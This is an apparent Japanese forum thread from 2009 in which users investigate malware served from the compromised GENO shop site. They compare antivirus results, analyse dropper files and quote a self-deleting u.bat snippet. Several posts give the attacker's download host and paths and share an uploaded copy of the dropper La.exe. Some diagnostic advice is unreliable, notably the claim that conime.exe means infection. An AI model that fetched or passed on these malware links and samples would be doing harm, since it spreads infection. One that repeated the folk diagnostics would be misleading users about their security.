ttp://up2.viploader.net/pic2d/src/viploader2d549059.jpg
ttp://up2.viploader.net/pic2d/src/viploader2d549055.jpg
ttp://up2.viploader.net/pic2d/src/viploader2d549054.jpg
ttp://up2.viploader.net/pic2d/src/viploader2d549051.jpg
ttp://up2.viploader.net/pic2d/src/viploader2d548900.jpg
ttp://up2.viploader.net/pic2d/src/viploader2d549057.jpg

>>269
このスレ開いただけで検知した（ImageViewURLReplace.dat使用）

ESETの3990来たな
UpdateInfoは未公開っぽいが

>>307
サンクス

「GENO担当者の脳に一部不具合がございました。」

　　　　　　　　　　　　 ／）
　　　　　　　　　　　／／／）
　　　　　　　　　 ／,.=ﾞ''"／　　　　　　　　　　　　　人人人人人人人人人人人人
　　　　　　　　 i f　,.r='"-‐'つ＿＿＿_　　　　　＜　　　　　　　　　　　　　　　　　　＞
　　　　　　　　/　　　_,.-‐'~／__,　 , ‐-＼　　　　＜　こまけぇことは・・・ん？　　　＞
　　　　　　　 ,i　　　,二ﾆ　（●）.　（●）　＼　　 ＜　　　　　　　　　　　　　　　　　　＞
　　　　　　　ﾉ　　　 ilﾞフ　　　（__人__）　　　 ＼　　YYYYYYYYYYYYYYYYYYYYYYY
　　　　　　,ｲ｢ﾄ､　　,!,!|　　　　 　￣`　　　　　　|
　　　　　/　iﾄヾヽ_/ｨ"＼　　　　　　　　　　　／


＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
　　　 l　ヽ. | 　 |　 | 　 |
.　　　|　__|　| __ |　|^)_ |　　　 ,-､
　　 _ |　　|　| 　 | .|ﾉ　 |. 　　 i　 ヽ
　 i'i. ヽ. -‐､ ! 　 !-! ‐- ヽ.　　〉､　l
　/ _ ﾉ.ヽ.　｀' (ﾉo(ヽ/　　 ヽノ (ﾉ |
　ヽ. ,｀ヽ,ｿ　　　　)ﾉ　　 ノ/o　　 |
　　 ＼ '　 ／　／　l　　　　 （)ヽ l
　　　　ヽ.　　 ' 　　 |　　(⌒ヽ　　|
　　　　　ヽ.　　　　 |　　 しノ　　/
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝

バスターの自動アップデート来たから期待してたのにクッキーしか検出しないw

ttp://thumb2.vipper.org/vfile/vip1173352.jpg

>>313
94.247.2.195/news/?id=3
のPDFはスルーのようだ。
まぁこれが本体とは限らないけど。

94.247.2.195から落としたLa.exe誰か要るか？

再起動してブルースクリーンにならないでタスクマネージャ起動してcmd.exeが無ければ大丈夫なのか？

>>318
取りあえず振り分け無しのフォルダに保存しようかと思ったが
なんか顔がムカつくのでやめた

>>301
うちも実際に発症していないんで、>>296さんの説と亜種がわんさかって事以外に関してあくまで仮説だけど、
id=ほにゃらら　の処理が行われるとCPU負荷率が余りに高くなりすぎて
ウィルスのスクリプトが完走しないって事なんかも考えられるかも。

>>320
virustotalにうｐれば？

これを期にAVGからavast!に乗り換えたわ
つかまだこのウイルスの全容が見えないとは

>>322
おれもだ、保存するまではないけどjaneのキャッシュに残しとこうと思って貼った

もう丸見えだろ

>>323
どちらにしてもイヤなウイルスだな

で、>>75の奴で検査した奴いるの？

>>231

>>323
今ウチにいるのは
?id=100 html
?id=2 PDF
?id=3 SWF
なんですけれどもどうしたらいいんですか＞＜

>>320
うｐしてくれるとありがたい

よく考えてみたら俺が普段しないフラッシュアップデートをしたのはたまたまじゃなくて重大な脆弱性ニュース見たからだわ
お前らも自宅警備を怠らずニュースぐらいはチェックしとけよ

あと、このノリでavastに乗り換えようとしてるそこのアホ、avastﾏﾝｾｰってなってる馬鹿にはAvira Antivirをお勧めしておく

>>173
※このアドレスは危険URLのひとつです。
危険！mailtoストームを発見！ (1115)

>>331
リカバリするか、とっととクリーンインストールしたほうがよいよ。

>>329
使い方も書いてないし怪しくて手だせなくね・・・

http://takeshima.2ch.net/test/read.cgi/news4vip/1239019678/

vipどうなってるか見たらひどいことになってる
スレタイも読めないひどいのがいっぱい

>>333
セキュ板臭い

>>332
はいよ
http://www1.axfc.net/uploader/He/so/213868

再起動ウィルス以来の恐ろしいのが来たなｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

今日、HDD買ってきてファイル保存退避させてからクリンインスコするしかないのかねえ。

>>338　セキュ板だったら黙ってNOD32じゃね。

?id=100にVistaでアクセスした人は2回目以降XPでアクセスしてもクッキー書き込みのスクリプトしか返さないらしいよ。
IPアドレスとユーザエージェントをサーバ側で管理してるらしい。
逆に、初回にXPでアクセスした人は、次にVistaでアクセスしても?id=2と?id=3への誘導コード入り。
つまりVistaでも感染の可能性あり。

リンク取得した時点で駄目なのか
さすがavast

>>339
悪用しちゃう(´・ω・｀)

全然関係ないけど昔ブラスターワームってのがあったよな
ただ再起動するだけだったけど当時はびびったもんだ

Avira Antivirマダ対応してないんだろ
いくらなんでもうんこすぎんだろ

>>339
これが元のウイルスなのか？

バルト三国め

適当に改行

using System;
using System.Collections.Generic;
using System.Text;
using Microsoft.Win32;

namespace geno{
class Program{
static void Main(string[] args){
Console.WriteLine("GENOウイルス検査ツール\n");
RegistryKey regkey = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32");

if (regkey != null){
string tes = (string)regkey.GetValue("aux");
if (tes == @"%System%\..\bpagokx.nmy"){
Console.WriteLine("感染の可能性があります");
}
else{
Console.WriteLine("感染の形跡はありません");
}
}
else
{
Console.WriteLine("regkey not found");

}
Console.ReadLine();
}}}

>>333
布教したいならどこがどう良いのか解説しろよ

エクセルデータとかは無事なのかね？

あれｗAvastでLa.exe検出されなくね？

>>339
中のEXEはノートン先生反応しないね。
取り扱い要注意。

でUPX圧縮されててアンパッカーインスコしてないからこれ以上追えないわ。
おいらは終了。

何だかわからんが、伝家の宝刀ウイルスセキュリティ ゼロを入れてる俺には無縁な話か

何したら良いのか分からん

>>339
パスきぼんぬ

春厨かよ

落としたみたがバカフィーまったく反応しねえ

>>358
Nortonも反応しない。なんでだろ

同じくAVG反応せず

>>358
バカフィーとかいうな　バカフィー様といえ

>>339
カスペ2009も反応しない

ちなみにAvira無反応

あ、バイナリエディタでUPX圧縮済みのを見ても
スレの最初のほうで報告があったu.batの文字列が書かれてる。

デフラグ何度してもCドライブ全部真っ赤なままなんでさっきリカバリした。
GENOが原因かは不明だが踏む前はなんともなかった。

>>303
577 名前： キバナスミレ(関東・甲信越)[] 投稿日：2009/04/05(日) 17:42:12.62 ID:vha5s7Cg
>>570
アクセスしたらマウスの動きが重くなったんで、おかしいなと
そんでnetstatコマンド打ったら94.247.2.195と通信してた
そしたらコマンドプロンプトが突然落ちた
その後タスクマネージャ見たらconime.exeが動いてた

良いバックアップツール探してる　入れ忘れたソフトが多くて思い出せないわ

＞＞３３９　ぱす何教えろ？

そんでnetstatコマンド打ったら94.247.2.195と通信してた
そしたらコマンドプロンプトが突然落ちた
その後タスクマネージャ見たらconime.exeが動いてた

ネタだろ

>>366
conime.exeなんて毎日動いてるだろ

>>339
BitDefender反応なし

>>339
Antivir　7.01.03.20
AVAST!　090406-01
スキャンしても無反応です　なんで？

>>367

232 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/04/07(火) 01:23:57
リカバリして帰還したが入れてないソフト重いだせん・・・

ああ思い打線のだよ。

ということは、La.exeは反応しないからあぶないなあ。どういう動きするファイルかは知らないけど。

vipからのお客様が混ざってるみたいですね。巣に持ち帰って
ばら撒く気か？

ちなみにLa.exeをvirustotalにうｐった結果はこう出た
http://www.virustotal.com/jp/analisis/d2ab3fb2e35d6cc5aaae32e7230a4646

>>371
それは軽くショックを受けるな。

もう消しとけばいいんじゃないかな

キーワードが正しくありません

>>339
avast反応なし

>>368
ν速のお約束パス。
昔のここの鯖名をテキトーに入れてみそ。

>>371
ちゃんとアップデートしたか？

>>349
実行結果
http://www3.uploda.org/uporg2146355.jpg

ここまで反応ありのソフト無しかよ。つーか有名どころ全滅？

>>345
PC壊れたから新しいの買ったんだけど
ネットに繋いだ途端に入ってきて困ったよｗ

いまさらながら
>>257
thx

PCの新品激安　スレでGENO見てみろって書かれて知らずに踏んだ。
激安PCあるのかと

でもメモリは確実に食ってWindowsはモッサリする

これって全然解決してないんじゃないか？ｗ

>>384
怖くて踏めない　誰か踏んで

>>377
まかふぃーの本気はじめて見たｗ

おまえらｸﾘｰﾝｲﾝｽｺ位いつでも出来る環境にしとけよ
何騒いでるんだ

カスペも反応してないみたいだ
ttp://www.virustotal.com/jp/analisis/3dda094319cd06b1fc0175bdaf516e44

たった今２回目のクリーンインスコ＼(^o^)／ｵﾜﾀ
もう踏まないｗ

>>390
ただの画像

>>391
いままで馬鹿にしてたけど、ちょっと見直したわｗ

5つしか対応してないとか流石におわてる

>>395
信じていいんだね？

>>390
DOSに、

GENOウイルス検査ツール

感染の形跡はありません。

って表示されてる画像

>>395
精神的ブラクラだって、ただの画像だ。

>>377
バカフィーとかいってごめんね

>>390
単なるろだだろ

あ、削除パス忘れたｗ

>>339
ありがとう
?id=10で何度か落としてみたけどLa.exe以外にも
Gml.exeとか6x.exeとかで落ちてきたから
名前はランダムで決まるっぽいな

VirusTotalで.exeを検知できるのは以下の6つだけ

eSafe 7.0.17.0 2009.04.06 Suspicious File
McAfee 5576 2009.04.06 Generic Dropper.ef
McAfee+Artemis 5576 2009.04.06 Generic Dropper.ef
Prevx1 V2 2009.04.06 High Risk Cloaked Malware
Symantec 1.4.4.12 2009.04.06 Trojan.Dropper
TrendMicro 8.700.0.1004 2009.04.06 PAK_Generic.001

ノートンで検知しない人はデイリーdat入れてみたら？

前967で上げた短縮URL集をビミョーに修正しました。
修正後の方を使って下さい。

修正前 http://www.katsakuri.sakura.ne.jp/src/up39423.txt
修正後 http://windyakin.if.land.to/src/up38_1142.txt

修正前の方は後で消しておきます

94.247.2.195/news/?id=10
ここから拾ったexeも反応なしだ > ESET
2回目以降exeが落ちてこなくなった(ﾉ∀`)

>>339
ファイル保存しなくて良かった・・・・・

英語出来るならESETに検体送ってやれ

>>75
どうやら感染していなかった
これ感染してた場合なんて出るん？

>>404
過去スレにも出てきたここ
http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-and-rogue-antivirus-p5.html
にあるとおり、.exeの前はランダムだね。

とりあえずバイナリエディタで開いたla.exe内のu.batの文字列
赤枠で囲ってる中に書かれてる。
なんか分岐処理してその結果実行されるんだと思う。

ttp://up2.viploader.net/pic/src/viploader970514.jpg

>>408
?id=10のexeと?id=2のPDFは送っておいた

怖くて全部踏めないわ

マカフィー入れててよかっただなんて初めて思った

avira7.1.3.21更新きた
前スレか前々スレあたりの人の話が本当ならこれで対応された？

あ、IF EXISTだからu.batの存在の有無をチェックしているのかも知れないわ。
これ以上はおいらわかんない。

>>393
カスペに検体送っといた

>>173って専ブラでプレビューしても死亡？

なんかお前らかっこいいぞ。閉鎖騒動の時のUNIXを思い出す

なになにavast!は検知できないの？

また閉鎖騒動起きないかな。

>>418
自動取得設定してるならアウト
触れてもアウト

こりゃぁえらい被害だなｗｗｗｗｗ

マイクロトレンド(ウイルスバスター2009)で、
2009/04/06の更新したけれど。

prnファイルのプリントソフトを誤検出してないか？
処理されちまったファイル、どうやって戻すんだよ。

>>422
触れてもアウトってニトログリセリンみたいなウイルスだな

なんで閉鎖しないの？
狂ってるの？

>>415
.jsと.pdfには対応してるが、
.exeと.swfには未対応
自分はPersonalなのでProfessionalで対応してるかとは分からん

最新avira>>339反応しないや　とおもったけど他のも反応しないのか
jsファイルに反応するってことか

>>420
恐らく、あくまで仮説だけど、
現状の各セキュリティソフトメーカーは
みんな書き換えられたjQuery.js内のid=ほにゃららの文字列だけをチェックしてウィルス判定しているだけで、
単にこのexeファイルに関しては全然チェックしていないってだけだと思うよ。
恐らく検体提出されて数日以内に即効で検出される様に対処されると思うけど。

>>339
avira,avg,avast送付済み

バイオハザードみたいだ

>>427
なるほど、そういうことだったのね

なんでGENOは何も対応しないんだよ
マジで教えてくれよ

>>427
あ、PDFにも対応済みなんだ。>>429の件、一部訂正。

これどこの会社なの？

社長シナか韓国人なの？

外部に作ってもらって対策できるスキルがないんでしょ
と、言う事だったらwebページ作った会社と鯖缶してる方の責任になるのかね

>>415
華麗にスルーしてるｗ

村岡SEXYウイルスの被害はひどいな
なによりもGENOの対応が酷い

まだ直ってないのかよｗ
もう火曜日だぞ

とりあえずpeerguardianにIP登録しといた
ログ眺めてもアクセスしてる形跡はない
antivir,comodo使用、WinXPで最新にしてる

ゲノはNECノート祭り以降は踏んでないと思うけど不安
いつから問題発生したんだ？
アンチウイルスでどのディレクトリをスキャンしたらいいかも教えて

つーかこれGENOの担当のPCも死んでて鯖だけが動いてるってことはないよな

携帯でもアウトなん？
ごろごろしながらしてて洒落にならんとかいやぜら

>>440
今月の四日から

>>440
4月4日とかなんとか
まだ内容詳細わかってないらしい

なんでログ読まねえんだよ。どっから来てるか知らないがいちいち
毎回最初から説明しないといけないのか？

マカフィーのフルスキャンが96%から進まん

>>442
携帯に被害及ばすウイルスって今から多くなるかもな

u.batが無いけど、cmdが立ち上がらん
アプリが全部落ちる
なぜだ？

のちのスカイネットである

>>422
マジで？プレビューしちゃったよ
でも>>75でチェックしても感染してないんだけど
>>75は釣りかよ

セキュ板など色々な場所にこのスレ貼られてるからな

>>427
自己レス
?id=3で得られる.swfは関係ないかも
virustotalでもonline malware scanでも検知されない
再生してみたけど真っ黒で何も映らない

５時間ぶりにきたが動きあった？

マカフィー様々のフルスキャンですら検知しないから安心していいよな
そもそもふんでないけど

>>156
よう、村岡じゃないか！

Avast!入れておけばURLに接続できないからやってみ。

>>453
ただ今スレ内の有志でウィルス解析中。。。

>>436

398 名前： コハコベ(千葉県)[] 投稿日：2009/04/06(月) 02:24:55.81 ID:RAsn9HbR
>>370
基本的に警察に書類送検されたりするのはあくまでサイト運営管理者側のゲノかと。

ただ、ここは実際にどういう契約になっているか知らないけど、
まともな企業が外注に仕事を投げる時はSLA(Service Level Agreement)と言って、
品質保証にまつわる契約を予め取り交わすんだよ。ま、その分契約金が高くなるけどな。

で、万一事前に取り交わした契約に盛り込まれた要求仕様にそぐわない物を納入したりすると
金銭的に外注企業から賠償を取れる契約を一緒に取り交わすんだよ。

だからそーいうまともな企業間契約を行っていると結局どっちにもツケがまわる。

ただ、恐らくここは保守更新契約まで含めて安くいー加減な契約をしてたと思うんで、
一方的にゲノが責任を負うケースになると思うよ。

今avastでやってみたけど、検出しなかった。
結局どうなんだ？

>>454
検出した項目　2　オワタ　きっと別のスパイウェアとかウイルスとかだとおもうが
今終わった　対応する必要はないとでた　

>>429
あと数日ね
様子見てみる

ESET送っておいた

検出したのは二件ともマカフィーお得意のトロイの木馬だった

もういい。一週間はPC起動しないわ

>>460
もしかしてGENO踏んだのにそうでたのか？

http://www3.uploda.org/uporg2146409.gif

情強気取りがあたふたしてるのは笑えるな

>>465
いや、俺の過去のレスを読んでくれるとわかるけど、俺に感染時の具体的症状はでてないんだ

ゲノの謝罪なしですか？

再起動余裕でした

最近fc2のブログでもウイルスが流行っているな

>>33
見てａｖａｓｔ入れてフルスキャンして
何も検出されてなければ

とりあえず無事でＦＡって事でいいの？？？？

このスレでは何も踏んでないし・・・・・・・・・

それと
これから踏みに言って「踏むなボケ！？」って言われるかどうかは「運」ってことなの？

>>457
解析できる猛者がいるのかなるなる

>300
愉快犯ｗ

ニュー速とGENOスレ以外どこも取り上げないな、ネットニュース何やってんだ
IT系巣窟のはてなですら見かけないし

俺の5歳になる老人PCだと強いウイルスに感染したら　きっと爆発すること必定なり

ざわ・・・ざわ・・・

>>473
ちなみにおいらは猛者じゃないから詳細な解析は無理ｗ

なぁ、自体が一段落したらまとめ動画作ったらおもしろくね？
ゲノの対応の悪さの宣伝にもなるし

【ｳｲﾙｽ感染】GENOを語るスレ30【ｱｸｾｽ注意】
http://pc11.2ch.net/test/read.cgi/pc/1239004304/

297 名前：名無しさん[sage] 投稿日：2009/04/07(火) 02:00:13 0
まーたやってくれたｗｗｗｗ
http://2sen.dip.jp/cgi-bin/upgun/up1/source/up25750.jpg

>>315
くそワロタ

>>452
どのidか忘れたけど一瞬真っ黒になったのはその.swfのせいか。

>>451
セキュ板は何のためにあるんだよ

ん？これAvastだろうがノートン先生だろうが対応できず、踏んだら確実に幹線してたってこと？

だめだ寝る。
念のためにﾊﾟｿはスリープさせとくわ

気づかずに短縮url踏んでたりすんのかなぁ・・・・
これ引っかかると目に見えて分かる感じ？

>>468
じゃあ大丈夫じゃないのか？

>>486
お手元のアンチウイルスを信じなさい

規制中につき携帯から
たった今踏んだが、もう直ったんじゃなかったのか?
やたらCPU使用率が動くからバスターで検査したら見慣れない変なのがやたら検知されるぞ
ちなみにVISTAのホームプレミア

>>487
でも別にウイルスが入ってるってことがわかって少し焦ったんだよ
トロイの木馬だったんで安心した

ウイルス垂れ流しで販売続けてスルーとかｗ

>>447
不安を煽るような言い方マジでやめてくれ

>>483
一番頑張らなきゃいけない板だけどなぁ・・・・・ｗ

>>488
Avast先生入ってたけどとっくにライセンスがきれてたわ
これを気に再取得するか

>>486
踏んでGENO開いたけど、メンテ入ったところっぽくて
ブルースクリーンとかそういった症状は出ないな。

a-squared使いやすくなってるな
昔はaｲとか表示されて駄目駄目だったのに

NOD32はまだ対応して無いのか

現状だと各ウイルスソフトとも踏んで感染するのを食い止めるだけなんじゃ？
踏んでからウイルス検査しても意味無いような

もう相当数踏んでるから情報量も莫大になり過ぎて
仕込んだ側も解析しきれんだろうさｗ
短縮馬鹿はリスクを薄める為にやってんだろう

nod32は3990に更新されたけど、怖くて試せねえや

情弱の俺はマカフィー先生が我が家のＰＣに問題無しとの判断を下してので寝る
たまたま数日ＧＥＮＯに行ってなくて助かったぜ

kickback.cc/upload/stored/up10577.jpg
これjaneで踏んだんだけど大丈夫？
カスペルスキーは反応しなかった

>>498
おそらくそう。
結局、本来の流れだと書き換えられたjQuery.jsの中の処理の結果、
この↑でうｐされたexeが仕込まれてしまう訳で、
結局、書き換えられたjQuery.jsを実行せずに未然に防げば
理論上はPCが感染する事はない訳で。

だから現状の各アンチウィルスソフトの対応内容だけで殆ど問題ないのかとは思うけど、
ただ、気になるのはu.batで具体的にどんな処理をしてるのかってこと。
ぶっちゃけ、u.batの中身が判れば殆ど全貌が明らかになるって事かと。

>>502
更新処理はしてるよな？

URLにkickbackがきてたら今回は危ないと認識してるよ

>>504してる

何となくsystem safety monitorが恋しくなってダウンロードを試みたら(検索)

一次配布サイト死亡
+
cowscorpion死亡
+
amebaメンテナンス

で萎えた

もうOS再インストールしようか…
感染したとき外付け繋いでたんだが、これを再インストールした後に繋いだらヤバい?

>>507
comodoのDiffence+オススメ
単体でも使えるし

>>508
PC内にウイルスがにゅるにゅる侵入してきてビクンビクンッ･･･っん!!!!ってなる

>>508
まぁまて。

既出かもしれんが、裏でコマンドプロンプト上のソフトを動かしてるアプリもある。
そういうソフトを動かした場合はconime.exeがタスクにあっても普通。
例えばMediaCoderとか。

何でこんなに踏んでる馬鹿多いの？w

そこに山があるから登るってやつだ
ドMどもが

産廃屋なので担当者の脳も産廃レベルでございますってか、まだ残りまくりｗ

URLは踏んでないけどJaneのキャッシュがどうのこうのってのが気になる

村岡わろた

http://tsushima.2ch.net/test/read.cgi/news/1238844402/536

536 名前： SM-3(茨城県)[sage] 投稿日：2009/04/05(日) 01:15:16.14 ID:0Dln3hZK
ルートにu.batってのが作られてたorz
中身は以下のとおり

:Z
DeL "K:\_.t"
IF EXIST "K:\_.t" GOTO Z
DeL "K:\u.bat"

こことは関係ないかもしれんが何かにやられたのか確実だorz


u.batの中身は↑らしい

>>452
詳しく調べてないが、IE向けの攻撃コードの中に
flashのマイナーバージョンを判別してる箇所がある。
マイナーバージョンの2つ目（x.x.[ここ].x)が124以上なら攻撃用swfは読み込まれない。

以上のことからして、flash player 9.0.124 未満に存在する脆弱性をつくswfだと推測

ttp://eeepc.cocolog-nifty.com/blog/2009/04/geno-560d.html

ここ見る限りでは大丈夫そうだけどどうだろ・・・。
また明日やってみるか。

VIPで貼られてたURLって全部大丈夫なん？

>>521
VIPで死ね

>>521
全部スーパーミラクルデンジャラスですさようなら

踏んで構わんマシンで踏んだ後でカスペのオンラインスキャンやってみた結果。
IEのテンポラリに残ってた。
jquery[1].js　感染：Trojan-Downloader.JS.Agent.dwf
A0G6M8XZ\Vy[1].pdf　感染：Exploit.Win32.Pidief.aog

Avast!は最新版でも、このファイルを検出しなかった。
Avast!入れてて安心してる人はカスペでもスキャンしてみるといいかも。
どなたかの参考になれば幸い。

セキュ板のAviraスレより
---------------------------------------------------
122 名無しさん＠お腹いっぱい。　[sage] 2009/04/07(火) 00:16:22
Geno ウイルス、 PDF と exe には対応したようだ。

\dropper.pdf
[0] Archive type: PDF Stream
--> Object
[DETECTION] Contains recognition pattern of the EXP/Pidief.vtb exploit
[WARNING] The file was ignored!
\dropper.swf'
\malformed.jquery.js'
\monitor.bin'
\dropper.bin'
[DETECTION] Contains a recognition pattern of the (harmful) BDS/Agent.afid back-door program
[WARNING] The file was ignored!
\dropper.html'

・Foxit Readerなので、Adobe Readerはインストールしていない。
・Flashは、常に最新版をインストール済み。
・最新版 Firefox + NoScript(Scriptオフ) + FlashBlockでネットしている。

Windows XPだけど、変なプロセスやあやしい挙動も無いしセーフ。
ああ、良かった。

>>513
PCの安売りスレに出入りしてるとGENOは日常的に訪れるサイトのひとつだろ。
俺はν速にスレが建ってからはGENOに行っていないがけど
最後に行ったのが４/４の前だったか後だったか覚えてないので不安を抱いてる

>>524
それはAdobe Readerが最新（9.1)じゃない状態で？

少しまえにこれ踏んでしまたかもしれないのだけどどうやって感染してるかわかるの？

Live2ch最強

>>529
このスレのログぐらいは全部読めよカス

リーダーとフラッシュの脆弱性が原因に挙げられてるけど、これって
・リーダーが最新版でない「かつ」フラッシュが最新版でない
・リーダーが最新版でない「または」フラッシュが最新版でない
のどっちがウイルスにやられるの？

もう実害でるまで放っておけよ

>>524
参考になった
マジ産休
でもカスペのオンラインスキャンって一度avast!をアンインスコしなきゃ駄目なんだよな
あー面倒だ

>>529

代表的なウイルス感染時の特徴ってのが前スレにある

http://tsushima.2ch.net/test/read.cgi/news/1239009596/24

>>513
馬鹿だからだろｗ

重くならないなら何の情報でもくれてやるのに

>>527
最後にゲノが四月二日なんだよな、助かったマジで

「PCの安売りスレに出入りしてるとGENOは日常的に訪れるサイトのひとつだろ。 」

ｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

特効薬みたいなの無いの？
食らったら死ぬまで？

GENOが安いとか冗談よしてくれ

　　　　　 　（　・ω・） 　んもー
　　　　　　 ○=｛=｝〇,
　　　　　 　 |:::::::::＼, ', ´
､､､､､､､､､､､し ､､､((（.＠）ｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

結構強烈なウイルスなのに緊急ワクチンでないのはなぜ

88 名前： 名無しさん [sage] 投稿日： 2009/04/06(月) 20:44:37 0
まさかのウイルス対策セール来た！！！

しかもそのページでウイルス反応アリｗｗｗｗｗｗｗｗｗｗｗｗ

http://up2.viploader.net/pic/src/viploader970234.jpg


もはや伝説レベル

>>505
そのレスでjane使いの俺はｶｶっとツール→キャッシュ一覧で
kickbackとurl検索した俺に隙はなかった

>>535
これいくつ当てはまるとアウト？

>>519
詳しい情報、ありがとう
まぁよくよく考えてみたらサーバに仕込まれたファイルなんだから
全く無害のファイルとは考えられないわな

>>535
それは当てにならない

>>518
どもども。

今どうにかUPXアンパッカーをインスコしてUPX圧縮を解除して
再度La.exeの中を見たら、↓の通りそのu.batの中身と殆ど同じような文字列が書かれてたわ。

ttp://up2.viploader.net/pic/src/viploader970581.jpg

推察だけど、このexeファイルがu.batを生成して、その上でu.batを実行してるのかと思う。

ただ、その中身だとKドラにある_tっていうフォルダを消しているだけなんだけど、
その中身がなんなのかが判らないな。

で、Flashは入れてるけどReaderは入れてない俺は大丈夫なの？

>>544
ワロス

今の所簡単に分かるのは再起動してブルスクになるかどうかだろう
まぁ、感染してたら帰ってこれないけど

>>545
kickback自体は危ないわけではなさそう
でもこの騒動でkickbackは何回か見てるから警戒しといた方がいいな

ThinkPadとかメーカ独自のソフトが動いてるのもあるからconime.exe云々はあてにならん
それよりモデムやルータのアクセスログでも見たほうがマシ
ログに該当IPがあったらどっちにしてもアウトだがｗ

GENOとかゴミサイトだろ
ショップインバース　ユーズドファクトリー　PCパレット　とかのがいい

CTRLおしながら　A　O

>>550
脆弱性はFlash Playerのバージョン10.0.12.36以前に存在する。
ユーザーが悪意のあるSWFファイルを閲覧した場合、
システムが外部から制御される恐れのある、危険度の高い脆弱性とされている。

>>546
全部嘘だから

Flash Playerのバージョンはどこで確認するのん？

>>519
WIN 10,0,12,36だた。
最近ウィンドウズのアップデイトはした。
アクロバットリーダーだけがver8なんだよなあ。

もしかして三つの要件が揃わないと発病しないのかな？とオレはオレは楽観主義者を気取ってみる。

windowsキー→Uキー二回（素早く

これを一回やってみた方がいい

>>559
Flash上で右クリックから

>>559
「flash player バージョン確認」でググると一件目に

>>559
↓のアドビのサイトに行くと画面にバージョン情報は表示されるよ。

ttp://www.adobe.com/software/flash/about/

>>560
1つでも要件を満たせばアウトというのが最近の流れ

特価品496
http://pc11.2ch.net/test/read.cgi/jisaku/1238831329/

908 名前：Socket774[sage] 投稿日：2009/04/07(火) 02:47:19 ID:UBlDf3UC
検出されたとかされないとか笑える
トロイなんだから本体が検出されるわけねーじゃんｗ
カス速民全滅しろや

909 名前：Socket774[sage] 投稿日：2009/04/07(火) 02:49:04 ID:ckw6xCI9
ν速民以外だろそのスレにいるのは
いろんなとこに貼られてるからカスどもが集まってる

>>560
10.0.12.36も欠陥品なので早くアップデートしれ

avastとAviraでやってみたけど何も出てこなかった。
netstat -aと-nbもやってみたけど、94.247.2.195はなかった。

java scriptとActiveX切ってれば大丈夫？

トンクス

>>528
その後アップデートしたけど、8.13で踏んだと思う。

それにしても村岡sexyウイルス猛威奮いすぎだろ

次スレから「良くある質問回答集」をテンプレに入れろｗ

>>566
あ？

俺なんだかんだで感染してなかったみたい
outpostが変な反応したんでアプリケーションが再起動するまで
遮断するを選択してセーフだったみたい　ラッキー

>>573
お前がテンプレ作っておけよ

なんかよくわからんがvistaなら問題ないっぽいのか？
まぁとりあえず色々判明するまでこのスレ監視だな

どうでもいいけど保存しておいたssmをインスコして起動するには再起動が必要みたいだから
既に入ってたcomodoのdefense+をonにして念には念をとparanoidモードにしたらProcess Governerあたりと干渉して何も出来なくなった
ようするにタスクマネージャーでcomodoデーモンを止めようとする→defense+が発動する無限ループの状態

結局再起動せざるを得なくなった

Flash Playerに危険度の高い脆弱性、対策済みの新バージョン公開
>アドビでは、脆弱性を修正したFlash Playerのバージョン10.0.22.87を公開。
http://internet.watch.impress.co.jp/cda/news/2009/02/25/22574.html

「Adobe Reader 9.1」「Acrobat 9.1」公開、深刻な脆弱性を修正
http://internet.watch.impress.co.jp/cda/news/2009/03/11/22742.html

INTERNET Watchとか見てない人はいちいち最新のにしないかもね

つかFlashPlayer以上にAdobeReaderなんて普通の人間はアップデートしないんじゃないのかなあ。

>>573
[Q.]感染してそうですが、大丈夫ですか???!!
[A.]タスクマネージャのタスク一覧にconime.exeがあればアウト

[Q.]対処法はありますか?
[A.]
├　1．再インストール
│　　　　　　　　　　　　　　　　　　　　　　　　　　　 　　
│　　　　［まちがい］　　　　　　　　　　　　　　　　　　　　　　　　　
│　　　　　 確実な方法ではありますが、時間がかかるのが難点です。
│　　　　 　それよりも別の手段を探してみませんか？
│　　　　　　ちょっとしたフリーウェアでなんとかなるかも？
│　　　　　　　　　　　　　　↑
│　　　　　　　　　　ココがポイント！
│
└　2．RegSeekerを使う

　　　　　　[せいかい]

[Q.]予防策はありますか
[A.]
├　1．諸々の脆弱性情報に気を配り、常に最新版を利用する
│　　　Comodo Firewall、Avira Antivirと必要に応じてDefense+も導入する。もちろんブラウザはOpera　　
│　　　　　　　　　　　　　　　　　　 　　
│　　　　［まちがい］　　　　　　　　　　　　　　　　　　　　　　　　　
│
│
└　2．RegSeekerを使う
　　　　　　[せいかい]

こういう時ほどコピペブログは役に立たんな

>>580
自動アップデートチェックはみんな切って使ってる筈だからね。

24も終わったし生ウィルス扱って無駄にテンション張って疲れちゃったから
そろそろ寝るわｗ

　　　　　　 ／￣＼
　　　　　　| ASUS |
　　　 　　　＼＿／
　　　　　　　＿|＿_
　　　　　 ／＼　／＼　excellent !!
　　　　／　 ⌒　 ⌒　＼
　　 　 |　　　(_人_)　　　|　　　　>>581乙　よくぞまとめた
　　　　＼ 　 ｀⌒´　　..Ｘ─／　 褒美として P5Qシリーズ を買う権利をやる
　　　 　　ヽ▼●▼<　　||ｰ､.
　　　　 /　 |｡|　|/　　 ヽ(ニ､｀ヽ.
　　　　.l　　 |｡|　|　ｒ-､y　｀ﾆ　 ﾉ

>>582
連中はリスク負う事は何もしないからなｗ
他人のふんどしで飯食う事しか眼中になくて腐ってるわ。

さっそく斧にあげられたテスト用のウイルスをばら撒きだしたヤツがいるな

初期のFlashPlayer10がブラクラ並に重かったから未だにver9を使ってる俺
現行のver10って軽くなった？

>>587
別に、初期のころからの奴も
重く感じたことなんてないなぁ
動画サイトみたって、精々cpu使用率10%行くか行かないかだし

>>587
PCが年寄りなんじゃね

>>581
http://www.google.co.jp/search?hl=ja&q=conime.exe&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=&aq=f&oq=

こういうのってわざと間違ったこと書き込んでるのか？

p://www.geno.co.jp/4D/images/top/banner_owabi.gif
たったこれだけかよw

デスクトップだけで10%くらいメモリ使ってるってことは、感染してるかもしれんのかね

